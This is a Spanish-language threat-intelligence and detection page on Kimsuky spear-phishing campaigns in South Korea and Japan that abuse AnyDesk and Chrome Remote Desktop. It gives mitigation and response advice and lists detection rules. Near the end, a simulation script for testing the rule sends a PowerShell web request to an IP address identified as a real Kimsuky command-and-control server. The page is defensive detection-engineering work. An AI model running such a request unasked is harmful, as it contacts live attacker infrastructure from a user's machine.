Kimsuky Usa Herramientas RMM Legítimas en Campañas del Noreste de Asia
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenaza de Kimsuky están llevando a cabo campañas de spear-phishing contra objetivos en Corea del Sur y Japón usando archivos LNK alojados en OneDrive. Una vez ejecutado, el malware establece persistencia a través de tareas programadas y recupera scripts de PowerShell para robar información del sistema, correos electrónicos y pulsaciones de teclado. Los atacantes también abusan de herramientas de control remoto legítimas como Chrome Remote Desktop y AnyDesk para mantener el acceso mientras se mimetizan con la actividad administrativa normal.
Investigación
La investigación descubrió una cadena de infección en múltiples etapas que involucra archivos LNK maliciosos, VBScript ofuscado y scripts de PowerShell. Investigadores analizaron componentes especializados, incluyendo una extensión maliciosa de Chrome diseñada para recolectar datos de Gmail y scripts usados para instalar AnyDesk. Los comentarios en coreano y las cadenas de depuración encontradas en código generado por IA también sugieren que los operadores pueden estar usando IA generativa durante el desarrollo.
Mitigación
Los usuarios deben tener precaución al abrir archivos LNK o enlaces recibidos de fuentes desconocidas, especialmente porque Windows puede ocultar las extensiones de archivo. Las organizaciones deberían auditar regularmente el software instalado para detectar implementaciones no autorizadas de Chrome Remote Desktop o AnyDesk. También se recomienda encarecidamente monitorear las extensiones del navegador para permisos excesivos o inesperados.
Respuesta
Si se detecta actividad de Kimsuky, los equipos de seguridad deben revisar las tareas programadas en busca de entradas sospechosas que lancen wscript.exe or powershell.exe. Los procesos de AnyDesk inesperados y los archivos ubicados en %appdata% los directorios también deberían ser investigados. Las extensiones del navegador y las configuraciones de escritorio remoto deben revisarse para identificar y eliminar los mecanismos de acceso no autorizados.
Flujo del Ataque
Todavía estamos actualizando esta parte.
Detecciones
Posible Archivo LNK Malicioso con Doble Extensión (vía línea de comandos)
LOLBAS WScript / CScript (vía creación de procesos)
LOLBAS Schtasks (vía línea de comandos)
Ejecución Sospechosa desde el Perfil de Usuario Público (vía creación de procesos)
Uso Sospechoso de CURL (vía línea de comandos)
Cadenas de Powershell Sospechosas (vía powershell)
Llamada a Métodos .NET Sospechosos desde Powershell (vía powershell)
Archivos Sospechosos en el Perfil de Usuario Público (vía evento de archivo)
IOCs (HashMd5) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia Parte 2
IOCs (HashMd5) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia Parte 1
IOCs (SourceIP) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia
IOCs (DestinationIP) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia
Detección de Indicadores de Comunicación de C&C de Kimsuky [Conexión de Red de Windows]
Tarea Programada para la Ejecución de VBScript Malicioso [Windows Powershell]
Ejecución de Simulación
Prerrequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario ha ganado un punto de apoyo inicial en la estación de trabajo de Windows a través de un archivo adjunto de spear-phishing. Para establecer Comando y Control (C2) y comenzar la exfiltración de información del sistema, el atacante ejecuta un comando de PowerShell. Este script está diseñado para imitar el comportamiento conocido del grupo Kimsuky: contactando un endpoint PHP específico en un servidor comprometido para recibir más instrucciones. El objetivo es mimetizarse con el tráfico web estándar mientras se alcanza el endpoint C2 preciso identificado por la inteligencia de amenazas.
-
Script de Prueba de Regresión:
# Script de Simulación de C2 de Kimsuky # Este script simula una solicitud a una de las URLs codificadas en la regla de detección. $c2_url = "http://103.77.242.187/view.php?type=apple&seed=simulation_test" $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" Write-Host "[!] Simulando Comunicación C2 de Kimsuky a: $c2_url" try { # Usando Invoke-WebRequest para generar tráfico HTTP a nivel de proxy $response = Invoke-WebRequest -Uri $c2_url -UserAgent $user_agent -Method Get -ErrorAction Stop Write-Host "[+] Solicitud completada. Código de Estado: $($response.StatusCode)" } catch { Write-Host "[-] Solicitud fallida (Esperado si la IP no está activa): $($_.Exception.Message)" } -
Comandos de Limpieza:
# No se crearon archivos persistentes; no se requiere limpieza. # Si se descargó un archivo, use: Remove-Item -Path "C:pathtoarchivo_malicioso.exe" -Force Write-Host "[*] Limpieza de simulación completa."